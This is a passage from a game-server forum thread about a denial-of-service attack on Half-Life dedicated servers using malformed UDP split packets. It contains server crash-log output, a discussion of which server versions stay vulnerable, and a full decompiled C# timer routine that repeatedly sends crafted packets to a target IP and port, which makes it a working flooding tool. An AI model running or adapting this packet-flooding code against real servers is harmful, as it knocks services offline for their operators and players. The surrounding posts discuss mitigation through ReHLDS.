Raised This Month: $51 Target: $400
 12% 

New ddos attack


Post New Thread Reply   
 
Thread Tools Display Modes
meTaLiCroSS
Gaze Upon My Hat
Join Date: Feb 2009
Location: Viņa del Mar, Chile
Old 12-30-2016 , 16:30   Re: New ddos attack
Reply With Quote #11

Just tried with a clean server instalation. For your information, this kind of exploits doesn't requieres a BOT to join your server and send a malformed packet causing a crash. Just by knowing that, discard your "delete dproto" argument, this can be done on clean both steamonly and dproto servers.

Quote:
Malformed packet size (4173, 3)
NET_GetLong: Ignoring duplicated split packet 4 of 1 ( 3 bytes )
Split packet without all 1 parts, part 1 had wrong sequence -1/-2
NET_GetLong: Ignoring duplicated split packet 4 of 1 ( 3 bytes )
Split packet without all 1 parts, part 1 had wrong sequence -1/-2
NET_GetLong: Ignoring duplicated split packet 4 of 1 ( 3 bytes )
Split packet without all 1 parts, part 1 had wrong sequence -1/-2
NET_GetLong: Ignoring duplicated split packet 4 of 1 ( 3 bytes )
Split packet without all 1 parts, part 1 had wrong sequence -1/-2
Malformed packet size (4173, 16)
NET_GetLong: Ignoring duplicated split packet 4 of 2 ( 16 bytes )
Invalid split packet length 4
NET_GetLong: Ignoring duplicated split packet 4 of 2 ( 16 bytes )
NET_GetLong: Ignoring duplicated split packet 4 of 2 ( 16 bytes )
Invalid split packet length 4
NET_GetLong: Ignoring duplicated split packet 4 of 2 ( 16 bytes )
NET_GetLong: Ignoring duplicated split packet 4 of 2 ( 16 bytes )
Invalid split packet length 4
NET_GetLong: Ignoring duplicated split packet 4 of 2 ( 16 bytes )
NET_GetLong: Ignoring duplicated split packet 4 of 2 ( 16 bytes )
Invalid split packet length 4
NET_GetLong: Ignoring duplicated split packet 4 of 2 ( 16 bytes )
NET_GetLong: Ignoring duplicated split packet 4 of 2 ( 16 bytes )
Invalid split packet length 4
NET_GetLong: Ignoring duplicated split packet 4 of 2 ( 16 bytes )
NET_GetLong: Ignoring duplicated split packet 4 of 2 ( 16 bytes )
Invalid split packet length 4
Malformed packet number (15)
Malformed packet number (15)
Malformed packet number (15)
Malformed packet number (15)
Malformed packet number (15)
But it justs spam this kind of messages. I don't see any exploitable way to break a server
__________________
Quote:
Originally Posted by joropito View Post
You're right Metalicross
meTaLiCroSS is offline
JusTGo
Veteran Member
Join Date: Mar 2013
Old 12-30-2016 , 16:57   Re: New ddos attack
Reply With Quote #12

Quote:
Originally Posted by meTaLiCroSS View Post
Just tried with a clean server instalation. For your information, this kind of exploits doesn't requieres a BOT to join your server and send a malformed packet causing a crash. Just by knowing that, discard your "delete dproto" argument, this can be done on clean both steamonly and dproto servers.



But it justs spam this kind of messages. I don't see any exploitable way to break a server
well sending alot of packets = more messages = lag.
__________________
JusTGo is offline
PRoSToTeM@
Veteran Member
Join Date: Jan 2010
Location: Russia, Ivanovo
Old 12-30-2016 , 17:06   Re: New ddos attack
Reply With Quote #13

So, this is fixed on ReHLDS.
__________________
PRoSToTeM@ is offline
Send a message via ICQ to PRoSToTeM@ Send a message via Skype™ to PRoSToTeM@
Freezo Begin
BANNED
Join Date: Mar 2014
Location: Morocco
Old 12-30-2016 , 17:55   Re: New ddos attack
Reply With Quote #14

meTaLiCroSS, As i said before the program that he shared will work only if fakedetector module included ...

the v2 of the exploit works on :
{ HLDS works on +80% }
{ reHLDS 60% }

It's not 100% fixed in reHLDS .

Last edited by Freezo Begin; 12-30-2016 at 17:55.
Freezo Begin is offline
Craxor
Veteran Member
Join Date: Jan 2016
Location: Romania
Old 12-30-2016 , 18:04   Re: New ddos attack
Reply With Quote #15

tooo many procents :O

all the time somebody invent something that can pass any detector , so don't mind with such things
__________________
Project: Among Us

Last edited by Craxor; 12-30-2016 at 18:04.
Craxor is offline
Send a message via ICQ to Craxor
Saint Sinner
Senior Member
Join Date: Feb 2016
Old 12-31-2016 , 07:50   Re: New ddos attack
Reply With Quote #16

I know but I don't change hl engine.. is a hosting problem..
Saint Sinner is offline
xeloxded
Member
Join Date: Dec 2016
Old 12-31-2016 , 13:36   Re: New ddos attack
Reply With Quote #17

What is the fix then? Because even with FakeDetector desactivated it will works (Using last HLDS Version)
xeloxded is offline
SkillartzHD
BANNED
Join Date: Dec 2016
Location: Romanian , Bucharest
Old 12-31-2016 , 19:14   Re: New ddos attack
Reply With Quote #18

Quote:
Originally Posted by xeloxded View Post
What is the fix then? Because even with FakeDetector desactivated it will works (Using last HLDS Version)
Use rehlds
SkillartzHD is offline
Saint Sinner
Senior Member
Join Date: Feb 2016
Old 12-31-2016 , 20:32   Re: New ddos attack
Reply With Quote #19

Code:
private void timer1_Tick(object sender, EventArgs e)
{
	int num;
	bool flag = int.TryParse(this.textBox1.Text, out num);
	if (flag)
	{
		bool flag2 = num > 0;
		if (flag2)
		{
			this.timer1.Interval = num;
		}
	}
	bool flag3 = string.IsNullOrEmpty(this.serverak.Text);
	if (!flag3)
	{
		string text = this.serverak.Text;
		string[] array = text.Split(new char[]
		{
			':'
		});
		IPEndPoint remoteEP = new IPEndPoint(IPAddress.Parse(array[0]), Convert.ToInt32(array[1]));
		Socket socket = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);
		socket.SendTimeout = 12;
		socket.ReceiveTimeout = 100;
		socket.Connect(remoteEP);
		List<byte> list = new List<byte>();
		byte[] array2 = new byte[2044];
		list.AddRange(new byte[]
		{
			254,
			255,
			255,
			255
		});
		bool @checked = this.checkBox2.Checked;
		if (@checked)
		{
			list.AddRange(new byte[]
			{
				254,
				255,
				255,
				255
			});
			list.AddRange(Encoding.ASCII.GetBytes("123 "));
		}
		bool checked2 = this.checkBox3.Checked;
		if (checked2)
		{
			for (int i = 1; i <= 2; i++)
			{
				List<byte> list2 = new List<byte>();
				byte[] array3 = new byte[2044];
				socket.Send(new byte[]
				{
					255,
					255,
					255,
					255,
					103,
					101,
					116,
					99,
					104,
					97,
					108,
					108,
					101,
					110,
					103,
					101,
					10
				});
				list2.AddRange(new byte[]
				{
					254,
					255,
					255,
					255
				});
				list2.AddRange(Encoding.ASCII.GetBytes("123123"));
				list2.AddRange(new byte[]
				{
					0,
					0,
					128,
					0,
					0,
					0,
					0,
					44,
					125,
					110,
					2,
					26,
					1,
					17,
					65
				});
				socket.Send(list2.ToArray());
			}
		}
		bool checked3 = this.checkBox4.Checked;
		if (checked3)
		{
			list.AddRange(new byte[]
			{
				254,
				255,
				255,
				255
			});
			list.AddRange(new byte[]
			{
				254,
				255,
				255,
				255
			});
			list.AddRange(Encoding.ASCII.GetBytes("xb"));
		}
		socket.Send(list.ToArray());
	}
}
Saint Sinner is offline
SkillartzHD
BANNED
Join Date: Dec 2016
Location: Romanian , Bucharest
Old 01-01-2017 , 05:23   Re: New ddos attack
Reply With Quote #20

Si ? Poti sa ne spui ce intelegi de acolo
SkillartzHD is offline
Old 01-01-2017, 13:59
JusTGo
This message has been deleted by JusTGo. Reason: never mind
Old 01-01-2017, 14:22
Spawner30
This message has been deleted by asherkin.
Reply



Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT -4. The time now is 12:15.


Powered by vBulletin®
Copyright ©2000 - 2024, vBulletin Solutions, Inc.
Theme made by Freecode